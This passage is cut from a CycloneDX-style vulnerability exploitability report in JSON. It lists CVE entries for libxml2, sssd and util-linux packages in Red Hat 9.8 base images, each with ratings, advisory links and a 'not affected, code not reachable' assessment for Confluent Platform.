          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11979",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        121
      ],
      "description": "libxml2 is vulnerable to multiple stack-based buffer overflows in the xmlcatalog utility when running in --shell mode. The usershell() function processes user input using fixed-size stack buffers without proper bounds checking.\nBy supplying an overly long input line, an attacker can overflow internal buffers (command, arg, and argv) during input parsing. This results in memory corruption within the stack frame.\nSuccessful exploitation may cause a crash or potentially allow arbitrary code execution in the context of the xmlcatalog process.\n\nThis issue has been fixed in the commit c2e233fc.\n\nNOTE:\nThe maintainers of this project did not agree that this issue is a vulnerability and considered it a bug.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11979"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11979"
        },
        {
          "url": "https://cert.pl/en/posts/2026/06/CVE-2026-11979"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/commit/c2e233fc1b341685fc99621b2768b503f777a72e"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11979"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11979"
        }
      ],
      "published": "2026-06-29T14:16:40+00:00",
      "updated": "2026-06-30T20:22:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-12610",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        825
      ],
      "description": "A flaw was found in sssd. When authenticating with a YubiKey, the SSSD PAM responder can crash due to a use-after-free vulnerability, where a memory pointer is incorrectly handled. A local attacker could exploit this flaw by manipulating smartcard or YubiKey contents, leading to a denial of service that disrupts authentication. This vulnerability also presents a potential for privilege escalation, although it is difficult to exploit.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-12610"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-12610"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490288"
        },
        {
          "url": "https://github.com/SSSD/sssd/issues/8796"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12610"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-12610"
        }
      ],
      "published": "2026-06-30T10:16:34+00:00",
      "updated": "2026-06-30T20:08:54+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.5.1-28.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-13595",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A flaw was found in the libblkid library of util-linux. During nested partition probing, the BSD, Minix, Solaris x86, and UnixWare partition probers cache a raw pointer to a parent partition entry in a dynamically allocated array. When subsequent partition additions cause the array to be reallocated, this pointer becomes stale, leading to a heap use-after-free read. An attacker who can present a crafted block device image (for example, via USB insertion or a loop-mounted disk image) can trigger this flaw without user interaction, as libblkid is invoked automatically by udev/udisks as root on block-device hot-plug events. This could lead to limited information disclosure or denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-13595"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26573"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-13595"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494101"
        },
        {
          "url": "https://github.com/util-linux/util-linux/commit/c0186f14fbdb02f64c8e0ba701ce727ea764ff4c"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13595"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13595"
        }
      ],
      "published": "2026-06-29T09:16:28+00:00",
      "updated": "2026-07-08T03:37:21+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
